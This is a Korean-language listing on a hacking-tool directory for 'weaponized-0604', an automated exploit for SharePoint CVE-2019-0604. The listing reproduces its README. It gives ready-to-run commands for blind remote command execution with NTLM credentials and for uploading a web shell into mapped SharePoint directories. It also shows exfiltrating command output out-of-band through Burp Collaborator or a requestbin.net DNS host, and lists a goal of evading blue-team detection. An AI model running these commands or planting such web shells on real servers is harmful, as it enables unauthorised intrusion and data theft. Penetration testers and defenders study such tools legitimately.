Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
weaponized-0604 — SharePoint CVE-2019-0604를 악용하는 자동화 도구 | Kitploit
도구/GitHubGitHub/gh0st0ne/weaponized-0604
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubgh0st0ne/weaponized-0604

weaponized-0604

SharePoint CVE-2019-0604를 악용하는 자동화 도구

저장소 보기
815년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

무기화된 CVE-2019-0604

CVE-2019-0604를 최대화하는 자동화된 익스플로잇 도구.

요구사항

requirements.txt 파일에는 이 도구가 사용하는 모든 Python 라이브러리가 나열되어 있어야 하며, 다음 명령어로 설치됩니다.

root@kitploit:~
$ pip install -r requirements.txt

수동 블라인드 익스플로잇 (자격 증명 있음/없음)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

업로드 기능

멋진 것(웹쉘, 정찰 도구 등)을 업로드하세요

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

디렉토리 매핑

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

OOB를 사용하여 명령 결과 얻기

Burp 확장 프로그램 collaborator_http_api 사용

  1. collaborator_http_api.py를 BurpSuite(Pro)에 설치하시겠습니까?

  2. 이 익스플로잇과 동일한 머신에서 BurpSuite가 실행 중인지 확인하세요.

  3. 실행, 출력 결과를 즐기세요 :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

DNSLog(예: requestbin.net) 사용

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

DNS에서 데이터 가져오기

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

직접 디코딩하세요 :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

할 일

  • 인수 파서
  • SharePoint, CVE-2019-0604
  • cmd를 여러 부분으로 분할 (args.cmds 내에서)
  • 요청 시 바이너리 지정, 블루 팀의 탐지 회피. (현재 cmd.exe 하드코딩됨)

저자

  • Tree
도구 다운로드